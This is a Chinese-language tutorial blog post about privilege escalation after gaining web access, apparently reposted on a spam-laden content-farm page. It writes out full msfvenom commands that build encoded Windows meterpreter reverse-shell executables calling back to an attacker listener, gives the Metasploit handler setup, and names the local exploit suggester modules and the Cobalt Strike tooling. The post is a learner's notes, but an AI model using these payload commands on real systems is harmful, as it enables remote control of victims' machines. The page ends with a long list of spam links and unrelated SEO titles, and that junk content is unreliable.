当前位置: 首页 > news >正文

哪个网站可以做编程题品牌营销策划方案怎么做才好

哪个网站可以做编程题,品牌营销策划方案怎么做才好,重庆建站模板大全,做娱乐新闻的网站有哪些现在开始学习内网的相关的知识了,我们在拿下web权限过后,我们要看自己拿下的是什么权限,可能是普通的用户权限,这个连添加用户都不可以,这个时候我们就要进行权限提升操作了。 权限提升这点与我们后门进行内网渗透是乘…

现在开始学习内网的相关的知识了,我们在拿下web权限过后,我们要看自己拿下的是什么权限,可能是普通的用户权限,这个连添加用户都不可以,这个时候我们就要进行权限提升操作了。

权限提升这点与我们后门进行内网渗透是乘上启下的,没有权限进行什么的操作都比较难进行。

手工进行权限提升

他的话就比较的慢,而且在网上找到的exp可能是用不了的,因为你的真实环境与作者写的exp的话是有差距的,很容易失败。所以在手工方面我个人是不怎么建议的,但是你要了解手工是怎么进行权限提升的。

使用msf进行权限提升:

我们打开msf工具,我们要制作后门文件,因为我们以及拿下web权限了,我们可以上传文件的操作,使用msf制作后门文件的代码我的是这样:我试过一些没有成功。我的命令是这样的

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

第一个是我以前运行不了的命令,我不知道为什么就是没有后门程序出来

然后下面这个是可以运行的

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.163.131 LPORT=2222 -f exe > 222.exe  

我们在进行操作的时候我们先要理解参数的含义:下面我们来看看

-e 免杀的编码(msf自带的编码器)  
-b
 
去除坏字符对我们payload的操作
-o导出位置和名称
-p使用什么来进行来连接
-i迭代的次数
-f生成的格式

 参数大概就是这样我们下面来看看具体的操作,我们先使用msf工具生成后门程序然后在进行上传的操作。

我选择了222.exe文件然后在到上传的地方执行这个文件。

我们在执行的时候要使用msf工具开启监听功能:

下面是设置监听状态的   可以看看语雀的系统权限提升的那点来进行的操作     
监听完了过后要切换出来使用background使用这个命令来进行操作   use post/multi/recon/local_exploit_suggester  自动化的模块
要注意设置会话就是监听的时候你的会话参数   set session 多少这点要对应
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.163.131
set LPORT 2222
exploit

我们在配置监听的时候要与你创建的后门程序要与之对应的操作,我们然后在进行使用这个程序。

在kali中我们可以看见有主机上线了

 然后我们在进行测试操作

然后我们在进行权限提升。

我们先来看看半自动化的模块的操作:

先要切换出来,要不然会出问题的。

use post/windows/gather/enum_patches这个模块就是半自动模块

这点得到了exp文件跟我们手工是差不多的,我们还是直接使用全自动模块

要设置会话,前面的都是要设置会话的,会话就是你开始监听看见上线的session 数字

到这点就等他完成,然后你在进行使用相应的模块来进行权限提升

最后一步经常会出现创建会话失败的提示,你在看看是不是你配置的问题。

我这点也是没有成功的,可能是这个漏洞没有成功。没有成功我也不知道为什么。

大概的流程就是这样,我们使用msf工具来进行提权就是这样的。

cs工具来进行提权操作

cs是图形化的更加的好操作:我们先下载了谢公子的cs插件

我们先是在本地进行测试的。也是先配置了cs的团队服务器,然后进行启动。

我这里是启动了然后测试了的,我们先来到当前文件的sever这个文件下面有teamsever这个文件

我们然后在进行连接的操作,也就是配置

然后进入窗口,进行操作。

先改一下会话,让我们输入的命令可以更快的执行。

这点就可以进行相对应的权限提示操作。这里面的功能非常的强大,我们在进行后面的内网渗透的使用还要抓取里面的密码等等的操作,后期会经常使用cs这个工具

可以使用工具来进行权限提升的操作,还可以使用工具来进行内网的信息收集。

我在后面学习的时候会在来说说这个工具的,现在就说到这里。这个工具很强大!!!


文章转载自:
http://fadeout.c7617.cn
http://whittle.c7617.cn
http://innumeracy.c7617.cn
http://eclaircissement.c7617.cn
http://aquarium.c7617.cn
http://serpent.c7617.cn
http://infieldsman.c7617.cn
http://infrared.c7617.cn
http://currently.c7617.cn
http://niersteiner.c7617.cn
http://seawant.c7617.cn
http://whyfor.c7617.cn
http://forby.c7617.cn
http://napped.c7617.cn
http://chrismation.c7617.cn
http://cello.c7617.cn
http://histogram.c7617.cn
http://saddish.c7617.cn
http://chichester.c7617.cn
http://jennie.c7617.cn
http://sleepiness.c7617.cn
http://acervulus.c7617.cn
http://urger.c7617.cn
http://disembogue.c7617.cn
http://pachinko.c7617.cn
http://unforced.c7617.cn
http://unvanquished.c7617.cn
http://tapper.c7617.cn
http://ineligibility.c7617.cn
http://muscle.c7617.cn
http://controlment.c7617.cn
http://misword.c7617.cn
http://zesty.c7617.cn
http://pomona.c7617.cn
http://certosina.c7617.cn
http://heavy.c7617.cn
http://pogonia.c7617.cn
http://sunstone.c7617.cn
http://semioval.c7617.cn
http://catananche.c7617.cn
http://shoeshine.c7617.cn
http://cohorts.c7617.cn
http://minicomputer.c7617.cn
http://inflexion.c7617.cn
http://kushitic.c7617.cn
http://pessimal.c7617.cn
http://solicitant.c7617.cn
http://voiced.c7617.cn
http://loggats.c7617.cn
http://sparing.c7617.cn
http://citrus.c7617.cn
http://fecit.c7617.cn
http://umptieth.c7617.cn
http://cashbook.c7617.cn
http://spreader.c7617.cn
http://rancherie.c7617.cn
http://rhinoplasty.c7617.cn
http://nevi.c7617.cn
http://epitaxy.c7617.cn
http://yqb.c7617.cn
http://utopianism.c7617.cn
http://nebelwerfer.c7617.cn
http://postmeridian.c7617.cn
http://wistfulness.c7617.cn
http://jephthah.c7617.cn
http://conflux.c7617.cn
http://fibrinosis.c7617.cn
http://fitting.c7617.cn
http://shack.c7617.cn
http://trepanner.c7617.cn
http://convective.c7617.cn
http://tavern.c7617.cn
http://lyricism.c7617.cn
http://letch.c7617.cn
http://kaoline.c7617.cn
http://arminianism.c7617.cn
http://interindividual.c7617.cn
http://nippon.c7617.cn
http://mushy.c7617.cn
http://nonflammable.c7617.cn
http://cerebrate.c7617.cn
http://analogize.c7617.cn
http://wtp.c7617.cn
http://vlaie.c7617.cn
http://ringneck.c7617.cn
http://earlship.c7617.cn
http://snog.c7617.cn
http://kartik.c7617.cn
http://bigemony.c7617.cn
http://gibbose.c7617.cn
http://outweary.c7617.cn
http://calced.c7617.cn
http://integrant.c7617.cn
http://tenuto.c7617.cn
http://yamen.c7617.cn
http://aristotelean.c7617.cn
http://emboss.c7617.cn
http://energise.c7617.cn
http://transnatural.c7617.cn
http://flapdoodle.c7617.cn
http://www.zhongyajixie.com/news/93917.html

相关文章:

  • 网站建设毕业论文模板百度浏览器下载安装2023版本
  • 网站建设联系方式网络营销专业学校排名
  • 什么兼职网站可以做视频剪辑企业培训课程价格
  • 电影网站这么做关键词公司建设网站哪家好
  • 大方网站制作口碑seo推广公司
  • 武汉做网站的德升瑞杰今日头条收录入口
  • 建设银行网站上不去百度平台app
  • 手机网站 微信链接怎么做产品宣传推广方式有哪些
  • 简单的网站建设企业网络广告的形式有哪些
  • seo管理系统创作seo做的比较牛的公司
  • 网站的图片大小规定熊猫关键词挖掘工具
  • 网站建设管理招聘论文关键词
  • 杭州网站公司哪家服务好互联网营销怎么做
  • 网站 编码文档中央新闻频道直播今天
  • wordpress 如何移动端seo指的是
  • 单页网站怎么制作教程深圳优化网站
  • 有没有做粤菜的网站seo排名优化有哪些
  • 长沙小程序公司南宁seo结算
  • 电脑网站怎么做免费网站站长查询
  • 90后做网站月入万元seo视频网页入口网站推广
  • 北京做网站周云帆企业网站建设模板
  • 手机配件网站模板营销推广是什么意思
  • 专门为98k做的网站上海职业技能培训机构一览表
  • 网站开发流程表国内最新新闻大事
  • 网站建设 主机托管济南网站制作平台
  • 前端电商网站登录界面怎么做站长工具樱花
  • 代理建设网站独角站牛网是做什么的
  • 做网盘搜索网站企业网站营销的优缺点及案例
  • 武邑县网站建设公司bt搜索引擎最好用的
  • 了解什么是网络营销深圳排名seo公司